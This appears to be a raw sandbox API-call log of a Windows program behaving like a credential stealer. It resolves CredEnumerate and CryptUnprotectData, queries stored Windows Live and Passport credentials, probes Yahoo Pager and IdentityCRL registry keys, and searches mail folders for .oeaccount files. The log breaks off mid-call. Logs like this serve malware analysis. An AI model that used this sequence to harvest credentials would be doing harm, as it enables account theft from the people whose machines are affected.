[0138.651] GetProcAddress (hModule=0x74c60000, lpProcName="CredFree") returned 0x74c84010 [0138.651] GetProcAddress (hModule=0x74c60000, lpProcName="CredDeleteA") returned 0x74c956b0 [0138.651] GetProcAddress (hModule=0x74c60000, lpProcName="CredEnumerateA") returned 0x74c95710 [0138.651] GetProcAddress (hModule=0x74c60000, lpProcName="CredEnumerateW") returned 0x74c83950 [0138.651] LoadLibraryA (lpLibFileName="crypt32.dll") returned 0x76680000 [0138.654] GetProcAddress (hModule=0x76680000, lpProcName="CryptUnprotectData") returned 0x766caf50 [0138.655] CredReadA (in: TargetName="Passport.Net\\*", Type=0x4, Flags=0x0, Credential=0x19f674 | out: Credential=0x19f674) returned 0 [0138.664] FreeLibrary (hLibModule=0x74c60000) returned 1 [0138.664] FreeLibrary (hLibModule=0x76680000) returned 1 [0138.666] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Yahoo\\Pager", ulOptions=0x0, samDesired=0x20019, phkResult=0x19eef4 | out: phkResult=0x19eef4*=0x0) returned 0x2 [0138.666] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\IdentityCRL", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea88 | out: phkResult=0x19ea88*=0x16c) returned 0x0 [0138.666] RegOpenKeyExA (in: hKey=0x16c, lpSubKey="Dynamic Salt", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ea8c | out: phkResult=0x19ea8c*=0x0) returned 0x2 [0138.666] RegCloseKey (hKey=0x16c) returned 0x0 [0138.666] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74c60000 [0138.667] GetProcAddress (hModule=0x74c60000, lpProcName="CredReadA") returned 0x74c958f0 [0138.667] GetProcAddress (hModule=0x74c60000, lpProcName="CredFree") returned 0x74c84010 [0138.667] GetProcAddress (hModule=0x74c60000, lpProcName="CredDeleteA") returned 0x74c956b0 [0138.667] GetProcAddress (hModule=0x74c60000, lpProcName="CredEnumerateA") returned 0x74c95710 [0138.667] GetProcAddress (hModule=0x74c60000, lpProcName="CredEnumerateW") returned 0x74c83950 [0138.667] CredEnumerateW (in: Filter="WindowsLive:name=*", Flags=0x0, Count=0x19f788, Credential=0x19f78c | out: Count=0x19f788, Credential=0x19f78c) returned 0 [0138.667] FreeLibrary (hLibModule=0x74c60000) returned 1 [0138.667] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x19f798, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0138.668] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0138.668] strlen (_Str="\\Microsoft\\Windows Mail") returned 0x17 [0138.668] _mbscat (in: param_1=0x19f7bb, param_2=0x4154f4 | out: param_1=0x19f7bb) returned 0x19f7bb [0138.668] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Mail") returned 0x3a [0138.668] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Mail") returned 0x3a [0138.668] strlen (_Str="*.oeaccount") returned 0xb [0138.668] _mbscpy (in: param_1=0x19ed5c, param_2=0x19f124 | out: param_1=0x19ed5c) returned 0x19ed5c [0138.668] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Mail") returned 0x3a [0138.668] _mbscat (in: param_1=0x19ed5c, param_2=0x414078 | out: param_1=0x19ed5c) returned 0x19ed5c [0138.668] _mbscat (in: param_1=0x19ed5c, param_2=0x4154e8 | out: param_1=0x19ed5c) returned 0x19ed5c [0138.668] FindFirstFileA (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Mail\\*.oeaccount", lpFindFileData=0x19eea0 | out: lpFindFileData=0x19eea0) returned 0xffffffff [0138.668] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Mail") returned 0x3a [0138.668] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Mail") returned 0x3a [0138.668] strlen (_Str="*.*") returned 0x3 [0138.668] _mbscpy (in: param_1=0x19f26c, param_2=0x19f634 | out: param_1=0x19f26c) returned 0x19f26c [0138.668] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Mail") returned 0x3a [0138.668] _mbscat (in: param_1=0x19f26c, param_2=0x414078 | out: param_1=0x19f26c) returned 0x19f26c [0138.668] _mbscat (in: param_1=0x19f26c, param_2=0x4147c4 | out: param_1=0x19f26c) returned 0x19f26c [0138.668] FindFirstFileA (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Mail\\*.*", lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 0xffffffff [0138.668] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x19f798, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0138.668] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0138.668] strlen (_Str="\\Microsoft\\Windows Live Mail") returned 0x1c [0138.668] _mbscat (in: param_1=0x19f7bb, param_2=0x41550c | out: param_1=0x19f7bb) returned 0x19f7bb [0138.668] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Live Mail") returned 0x3f [0138.668] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Live Mail") returned 0x3f [0138.668] strlen (_Str="*.oeaccount") returned 0xb [0138.668] _mbscpy (in: param_1=0x19ed5c, param_2=0x19f124 | out: param_1=0x19ed5c) returned 0x19ed5c [0138.668] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Live Mail") returned 0x3f [0138.668] _mbscat (in: param_1=0x19ed5c, param_2=0x414078 | out: param_1=0x19ed5c) returned 0x19ed5c [0138.668] _mbscat (in: param_1=0x19ed5c, param_2=0x4154e8 | out: param_1=0x19ed5c) returned 0x19ed5c [0138.668] FindFirstFileA (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Live Mail\\*.oeaccount", lpFindFileData=0x19eea0 | out: lpFindFileData=0x19eea0) returned 0xffffffff [0138.669] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Live Mail") returned 0x3f [0138.669] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Live Mail") returned 0x3f [0138.669] strlen (_Str="*.*") returned 0x3 [0138.669] _mbscpy (in: param_1=0x19f26c, param_2=0x19f634 | out: param_1=0x19f26c) returned 0x19f26c [0138.669] strlen (_Str="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Live Mail") returned 0x3f [0138.669] _mbscat (in: param_1=0x19f26c, param_2=0x414078 | out: param_1=0x19f26c) returned 0x19f26c [0138.669] _mbscat (in: param_1=0x19f26c, param_2=0x4147c4 | out: param_1=0x19f26c) returned 0x19f26c [0138.669] FindFirstFileA (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Live Mail\\*.*", lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 0xffffffff [0138.669] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Live Mail", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f768 | out: phkResult=0x19f768*=0x0) returned 0x2 [0138.669] ExpandEnvironmentStringsA (in: lpSrc="", lpDst=0x19f8a0, nSize=0x104 | out: lpDst="") returned 0x1 [0138.669] strlen (_Str="") returned 0x0 [0138.669] _strcmpi (_Str1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows Live Mail", _Str2="") returned 1 [0138.669] strlen (_Str="") returned 0x0 [0138.669] strlen (_Str="") returned 0x0 [0138.669] strlen (_Str="*.oeaccount") returned 0xb [0138.669] _mbscpy (in: param_1=0x19ed5c, param_2=0x19f124 | out: param_1=0x19ed5c) returned 0x19ed5c [0138.669] strlen (_Str="") returned 0x0 [0138.669] _mbscat (in: param_1=0x19ed5c, param_2=0x4154e8 | out: param_1=0x19ed5c) returned 0x19ed5c [0138.669] FindFirstFileA (in: lpFileName="*.oeaccount", lpFindFileData=0x19eea0 | out: lpFindFileData=0x19eea0) returned 0xffffffff [0138.669] strlen (_Str="") returned 0x0 [0138.669] strlen (_Str="") returned 0x0 [0138.669] strlen (_Str="*.*") returned 0x3 [0138.669] _mbscpy (in: param_1=0x19f26c, param_2=0x19f634 | out: param_1=0x19f26c) returned 0x19f26c [0138.669] strlen (_Str="") returned 0x0 [0138.669] _mbscat (in: param_1=0x19f26c, param_2=0x4147c4 | out: param_1=0x19f26c) returned 0x19f26c [0138.669] FindFirstFileA (in: lpFileName="*.*", lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 0x5bea38 [0138.669] strlen (_Str="") returned 0x0 [0138.669] strlen (_Str=".") returned 0x1 [0138.669] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.669] strlen (_Str="") returned 0x0 [0138.669] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] strcmp (_Str1=".", _Str2="..") returned -1 [0138.670] strcmp (_Str1=".", _Str2=".") returned 0 [0138.670] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.670] strlen (_Str="") returned 0x0 [0138.670] strlen (_Str="..") returned 0x2 [0138.670] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] strlen (_Str="") returned 0x0 [0138.670] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] strcmp (_Str1="..", _Str2="..") returned 0 [0138.670] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.670] strlen (_Str="") returned 0x0 [0138.670] strlen (_Str="11rXyo20WdbLDOoTgRR.jpg") returned 0x17 [0138.670] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] strlen (_Str="") returned 0x0 [0138.670] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.670] strlen (_Str="") returned 0x0 [0138.670] strlen (_Str="1HnLHpD762F.m4a") returned 0xf [0138.670] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] strlen (_Str="") returned 0x0 [0138.670] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.670] strlen (_Str="") returned 0x0 [0138.670] strlen (_Str="34AjT.png") returned 0x9 [0138.670] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] strlen (_Str="") returned 0x0 [0138.670] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.670] strlen (_Str="") returned 0x0 [0138.670] strlen (_Str="3J38TW6.gif") returned 0xb [0138.670] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] strlen (_Str="") returned 0x0 [0138.670] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.670] strlen (_Str="") returned 0x0 [0138.670] strlen (_Str="4o_p7epqP_WNFR6e.swf") returned 0x14 [0138.670] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] strlen (_Str="") returned 0x0 [0138.670] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.670] strlen (_Str="") returned 0x0 [0138.670] strlen (_Str="7APIQXt.xlsx") returned 0xc [0138.670] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] strlen (_Str="") returned 0x0 [0138.670] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.670] strlen (_Str="") returned 0x0 [0138.670] strlen (_Str="92kmdOizrhs.bmp") returned 0xf [0138.670] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] strlen (_Str="") returned 0x0 [0138.670] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.670] strlen (_Str="") returned 0x0 [0138.670] strlen (_Str="9ZaFe5Ky7Qznb4NC.swf") returned 0x14 [0138.670] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.670] strlen (_Str="") returned 0x0 [0138.670] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.671] strlen (_Str="") returned 0x0 [0138.671] strlen (_Str="b7BfNjDiVvNI6hV.wav") returned 0x13 [0138.671] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] strlen (_Str="") returned 0x0 [0138.671] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.671] strlen (_Str="") returned 0x0 [0138.671] strlen (_Str="desktop.ini") returned 0xb [0138.671] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] strlen (_Str="") returned 0x0 [0138.671] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.671] strlen (_Str="") returned 0x0 [0138.671] strlen (_Str="Dpz8boAHVx5_k.mp3") returned 0x11 [0138.671] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] strlen (_Str="") returned 0x0 [0138.671] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.671] strlen (_Str="") returned 0x0 [0138.671] strlen (_Str="EY-85l4ZHmyKzZn.docx") returned 0x14 [0138.671] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] strlen (_Str="") returned 0x0 [0138.671] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.671] strlen (_Str="") returned 0x0 [0138.671] strlen (_Str="JTUO7vL.swf") returned 0xb [0138.671] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] strlen (_Str="") returned 0x0 [0138.671] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.671] strlen (_Str="") returned 0x0 [0138.671] strlen (_Str="L7WFyAob bWVwBYpNoe.gif") returned 0x17 [0138.671] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] strlen (_Str="") returned 0x0 [0138.671] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.671] strlen (_Str="") returned 0x0 [0138.671] strlen (_Str="mOlSIqK8SWHaX.wav") returned 0x11 [0138.671] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] strlen (_Str="") returned 0x0 [0138.671] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.671] strlen (_Str="") returned 0x0 [0138.671] strlen (_Str="nahIFjynqB9.wav") returned 0xf [0138.671] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.671] strlen (_Str="") returned 0x0 [0138.671] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.672] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.672] strlen (_Str="") returned 0x0 [0138.672] strlen (_Str="ngoHNmUuXxI2.mp4") returned 0x10 [0138.672] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.672] strlen (_Str="") returned 0x0 [0138.672] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.672] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.672] strlen (_Str="") returned 0x0 [0138.672] strlen (_Str="nhVhwfpevWnzE9IdPIpW.gif") returned 0x18 [0138.672] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.672] strlen (_Str="") returned 0x0 [0138.672] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.672] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.672] strlen (_Str="") returned 0x0 [0138.672] strlen (_Str="O iSz0SXnMYLX.m4a") returned 0x11 [0138.672] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.672] strlen (_Str="") returned 0x0 [0138.672] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.672] FindNextFileA (in: hFindFile=0x5bea38, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0138.672] strlen (_Str="") returned 0x0 [0138.672] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.672] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.672] strlen (_Str="") returned 0x0 [0138.672] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0138.672] strcmp (_Str1="oAZoBv-GDm", _Str2="..") returned 1 [0138.672] strcmp (_Str1="oAZoBv-GDm", _Str2=".") returned 1 [0138.672] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.672] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.672] strlen (_Str="*.oeaccount") returned 0xb [0138.672] _mbscpy (in: param_1=0x19e324, param_2=0x19e6ec | out: param_1=0x19e324) returned 0x19e324 [0138.672] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.672] _mbscat (in: param_1=0x19e324, param_2=0x414078 | out: param_1=0x19e324) returned 0x19e324 [0138.672] _mbscat (in: param_1=0x19e324, param_2=0x4154e8 | out: param_1=0x19e324) returned 0x19e324 [0138.672] FindFirstFileA (in: lpFileName="oAZoBv-GDm\\*.oeaccount", lpFindFileData=0x19e468 | out: lpFindFileData=0x19e468) returned 0xffffffff [0138.672] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.672] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.672] strlen (_Str="*.*") returned 0x3 [0138.672] _mbscpy (in: param_1=0x19e834, param_2=0x19ebfc | out: param_1=0x19e834) returned 0x19e834 [0138.672] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.672] _mbscat (in: param_1=0x19e834, param_2=0x414078 | out: param_1=0x19e834) returned 0x19e834 [0138.672] _mbscat (in: param_1=0x19e834, param_2=0x4147c4 | out: param_1=0x19e834) returned 0x19e834 [0138.672] FindFirstFileA (in: lpFileName="oAZoBv-GDm\\*.*", lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0x5beab8 [0138.672] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.672] strlen (_Str=".") returned 0x1 [0138.672] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0138.672] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.672] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] strcmp (_Str1=".", _Str2="..") returned -1 [0138.673] strcmp (_Str1=".", _Str2=".") returned 0 [0138.673] FindNextFileA (in: hFindFile=0x5beab8, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0138.673] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.673] strlen (_Str="..") returned 0x2 [0138.673] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.673] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] strcmp (_Str1="..", _Str2="..") returned 0 [0138.673] FindNextFileA (in: hFindFile=0x5beab8, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0138.673] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.673] strlen (_Str="2 214WnbGPsAyl.pptx") returned 0x13 [0138.673] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.673] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] FindNextFileA (in: hFindFile=0x5beab8, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0138.673] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.673] strlen (_Str="2ZtY-Jixsa2fGukJCQl.xls") returned 0x17 [0138.673] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.673] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] FindNextFileA (in: hFindFile=0x5beab8, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0138.673] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.673] strlen (_Str="aa-MhpiZt.jpg") returned 0xd [0138.673] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.673] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] FindNextFileA (in: hFindFile=0x5beab8, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0138.673] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.673] strlen (_Str="aUgm3Jy7lNg_a32UyI.xls") returned 0x16 [0138.673] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.673] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] FindNextFileA (in: hFindFile=0x5beab8, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0138.673] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.673] strlen (_Str="eEYb71dCI6e0acGlSYj.mp3") returned 0x17 [0138.673] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.673] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] FindNextFileA (in: hFindFile=0x5beab8, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0138.673] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.673] strlen (_Str="IhEUrbf.xlsx") returned 0xc [0138.673] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0138.673] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.673] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] FindNextFileA (in: hFindFile=0x5beab8, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0138.674] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.674] strlen (_Str="Pxf_G3ntURI6.swf") returned 0x10 [0138.674] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.674] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] FindNextFileA (in: hFindFile=0x5beab8, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0138.674] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.674] strlen (_Str="slOo.gif") returned 0x8 [0138.674] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] strlen (_Str="oAZoBv-GDm") returned 0xa [0138.674] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0138.674] FindNextFileA (in: hFindFile=0x5beab8, 